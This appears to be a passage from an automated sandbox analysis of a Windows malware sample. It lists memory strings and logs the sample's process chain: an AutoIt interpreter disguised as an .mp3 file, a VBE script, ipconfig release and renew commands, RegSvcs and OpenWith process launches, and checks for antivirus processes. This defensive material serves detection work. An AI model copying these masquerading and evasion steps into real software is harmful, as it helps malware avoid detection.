Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 3)343<3@3f3j3p3z3d3n3y3 memstr_6b1956a4-8
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 4)434=4h4p4t4z4^4d4n4x4 memstr_53dbfb5c-0
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 5#5)5-535=5g5q5\5d5h5n5r5x5 memstr_2d4b09c9-e
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6 6+63676=6a6g6q6[6e6p6x6|6 memstr_c760d88c-2
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 7 7*747?7g7k7q7u7[7e7o7y7 memstr_67d24a94-a
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 8 8$8*848>8h8s8[8_8e8i8o8y8 memstr_812f6908-7
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9"9*9.94989>9h9r9\9g9o9s9y9}9 memstr_dc011d11-6
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: :!:+:6:>:b:h:l:r:\:f:p:{: memstr_5792d373-f
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;!;+;5;?;j;r;v;\;`;f;p;z; memstr_173daed4-f
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <!<%<+</<5<?<i<s<^<f<j<p<t<z< memstr_3f42bde2-9
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ="=-=5=9=?=c=i=s=]=g=r=z=~= memstr_1508cd50-e
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: >">,>6>a>i>m>s>w>]>g>q>{> memstr_008a1a6f-a
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ?"?&?,?6?@?j?u?]?a?g?k?q?{? memstr_46c9c109-7
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 0$0,00060:0@0j0t0^0i0q0u0{0 memstr_ae0c5c89-c
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1#1-181@1d1j1n1t1^1h1r1}1 memstr_93520cc5-e
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 2#2-272a2l2t2x2^2b2h2r2|2 memstr_8f84a185-3
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 3#3'3-31373a3k3u3`3h3l3r3v3|3 memstr_595341ca-e
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 4$4/474;4a4e4k4u4_4i4t4|4 memstr_892bcde6-3
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 5$5.585c5k5o5u5y5_5i5s5}5 memstr_11ddfb28-b
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6$6(6.686b6l6w6_6c6i6m6s6}6 memstr_266ba5aa-6
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 7&7.72787<7b7l7v7`7k7s7w7}7 memstr_73a1ca37-e
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 8%8/8:8b8f8l8p8v8`8j8t8 memstr_902807b1-1
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9%9/999c9n9v9z9`9d9j9t9~9 memstr_5e1ceeb8-3
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: :%:):/:3:9:c:m:w:b:j:n:t:x:~: memstr_4ff0eace-f
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;&;1;9;=;c;g;m;w;a;k;v;~; memstr_c13434fd-0
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <&<0<:<e<m<q<w<[<a<k<u< memstr_514b4e21-4
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: = =&=*=0=:=d=n=y=a=e=k=o=u= memstr_2a25c7c7-c
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: >(>0>4>:>>>d>n>x>b>m>u>y> memstr_a896c27c-3
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ?'?1?<?d?h?n?r?x?b?l?v? memstr_028502d2-d
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 0!0'010;0e0p0x0\0b0f0l0v0 memstr_78362a12-a
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1'1+11151;1e1o1y1d1l1p1v1z1 memstr_d8fed597-b
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 2(232;2?2e2i2o2y2c2m2x2 memstr_8ab03aba-2
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 3(323<3g3o3s3y3]3c3m3w3 memstr_cacefe5f-5
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 4"4(4,424<4f4p4[4c4g4m4q4w4 memstr_21a07d00-d
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 5*52565<5@5f5p5z5d5o5w5{5 memstr_880b2fca-a
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6)636>6f6j6p6t6z6d6n6x6 memstr_8809bdf3-7
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 7#7)737=7g7r7z7^7d7h7n7x7 memstr_a188020f-5
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 8!8)8-83878=8g8q8[8f8n8r8x8|8 memstr_42ed59dc-1
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9 9*959=9a9g9k9q9[9e9o9z9 memstr_bfcfbe31-4
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: : :*:4:>:i:q:u:[:_:e:o:y: memstr_7b0e05a7-e
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ; ;$;*;.;4;>;h;r;];e;i;o;s;y; memstr_2095d276-8
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <!<,<4<8<><b<h<r<\<f<q<y<}< memstr_10a10edb-c
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: =!=+=5=@=h=l=r=v=\=f=p=z= memstr_6a00a33a-8
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: >!>%>+>5>?>i>t>\>`>e>k>o>r memstr_322eb374-a
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: >!>%>+>5>?>i>t>\>`>e>k>o>rrrrrrrr memstr_a0ee5b87-4
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rrrrrr memstr_9eb080af-9
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rrrrrrrrrrr memstr_d0572c58-4
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr memstr_7cf7cdf0-5
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rrrrr memstr_fec4be86-4
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rrrrrrr memstr_56aaf974-2
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rrrrrrrrr memstr_3679339b-2
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rrrrrrrr memstr_16bc23ee-d
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr memstr_cbe5bf69-c
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr memstr_353e8cea-2
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr memstr_0f47e708-7
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rrrrrrrrrrrr memstr_5bb4449d-e
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr memstr_f86704a9-0
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr memstr_756a5388-9
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr memstr_0f577941-2
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr memstr_ac3a1039-9
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rrrrrrrrrr memstr_dd3d09a9-0
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr memstr_c219027a-f
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rrrrrrrrrrrrrrrr memstr_91f0622e-b
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr memstr_4e24eba4-e
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr memstr_566f0b6f-f
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: mmmmmmmm memstr_8e39a260-1
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: mmmmmmm memstr_c66657ce-9
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr/ memstr_95d11691-a
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr memstr_5a937bc8-f
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rrrrrrrrrrrrrr memstr_b1409f49-6
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: !!!!! memstr_aaa7efc2-c
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: zzrrzz memstr_2e3dd5d4-f
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: qqqrrz memstr_eeb21013-f
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: memstr_439792ec-8
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rjjjjjjjjjjjjjrrr memstr_83006967-d
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rrrrrrrrrrrrrrrrrrmmmmmmmmmmmmm| memstr_68047a39-8
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: mmmmmmmmmmmmrrrrrrrrrrrrrrr memstr_acb8f20c-4
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 4g5f8l879w9a9 memstr_35748e49-d
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <$<k< memstr_23c9e7c1-7
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: =!=,=7=b=m=x=c=n=y= memstr_0afda70d-5
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: =>"> memstr_47e60004-1
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ?*?5?g?r?d?o?z? memstr_74a1d53b-5
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 5m8h8 memstr_38f0b0cb-5
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 112b2f2j2n2r2v2z2^2b2 memstr_c1edc7a3-2
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 3#4s4 memstr_4478930f-7
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 5#5'5+5/53575;5?5c5g5k5o5s5w5[5_5c5g5k5o5s5w5{5 memstr_22c80ed0-5
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6m6z6r7]7v7 memstr_510bbce4-6
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ?&?*?.?2?6?:?>?b?f?j?n?r?v?z?^?b?f?j?n?r?v?z?~? memstr_71285b46-c
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1-1x1 memstr_aab16806-3
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6"6'6,61666<6e6 memstr_6c12c1eb-8
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 727x7 memstr_43582f6e-c
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 7+8_8 memstr_628f5a21-c
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9g9u9|9 memstr_2723aadd-7
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;v;[;`;e;j;o;u;z; memstr_0cf1cd0f-8
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: =f=u= memstr_90d866dc-3
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1 2l2 memstr_e742a6f9-9
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003DBB02 SendInput,keybd_event, 7_2_003DBB02
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003DEBB3 mouse_event, 7_2_003DEBB3
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\rmxb.vbe"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c qwlvpmrupf.mp3 tnlupe.mp3
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 qwlvpmrupf.mp3 tnlupe.mp3
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\SysWOW64\OpenWith.exe "C:\Windows\system32\openwith.exe"
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003D13F2 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 7_2_003D13F2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003D1EF3 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 7_2_003D1EF3
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007847000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.000000000113B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: qwlvpmrupf.mp3, 00000007.00000003.1947990948.00000000010A2000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947073721.0000000001097000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947564822.000000000109B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: qwlvpmrupf.mp3, qwlvpmrupf.mp3.exe Binary or memory string: Shell_TrayWnd
Source: qwlvpmrupf.mp3.exe, 00000010.00000003.1992063073.0000000001733000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076356702.0000000001750000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1992150517.0000000001744000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If WinGetText("Program Manager") = "0" Then
Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2296018168.0000000001403000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2294257622.00000000013E9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerq=
Source: qwlvpmrupf.mp3, 00000007.00000003.1950739253.000000000104C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1950894323.0000000001053000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If WinGetText("Program Manager") = "0" ThenLL
Source: qwlvpmrupf.mp3, 00000007.00000003.1829676845.0000000001043000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If WinGetText("Program Manager") = "0" ThenEy

Language, Device and Operating System Detection

Source: Yara match File source: Process Memory Space: qwlvpmrupf.mp3 PID: 7640, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: qwlvpmrupf.mp3.exe PID: 8072, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: qwlvpmrupf.mp3.exe PID: 8188, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: qwlvpmrupf.mp3.exe PID: 4092, type: MEMORYSTR
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B26694 cpuid 0_2_00B26694
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: GetLocaleInfoW,GetNumberFormatW, 0_2_00B1FD34
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\SysWOW64\OpenWith.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B2454A GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle, 0_2_00B2454A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003CE5F8 GetUserNameW, 7_2_003CE5F8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003ABF0F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 7_2_003ABF0F
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B103BE GetVersionExW, 0_2_00B103BE
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: qwlvpmrupf.mp3.exe, 00000010.00000003.2078194158.0000000001805000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076809860.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076956481.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000002.2079848349.0000000001806000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2077127799.00000000017FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bdagent.exe
Source: OpenWith.exe, 0000000F.00000002.2945478445.0000000004EB0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tcpview.exe
Source: qwlvpmrupf.mp3.exe, 00000010.00000003.2078194158.0000000001805000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076809860.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076956481.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000002.2079848349.0000000001806000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2077127799.00000000017FC000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2294257622.00000000013E9000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2298245187.0000000001457000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2295050047.0000000001455000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2294907619.0000000001447000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000002.2301395963.0000000001458000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avp.exe
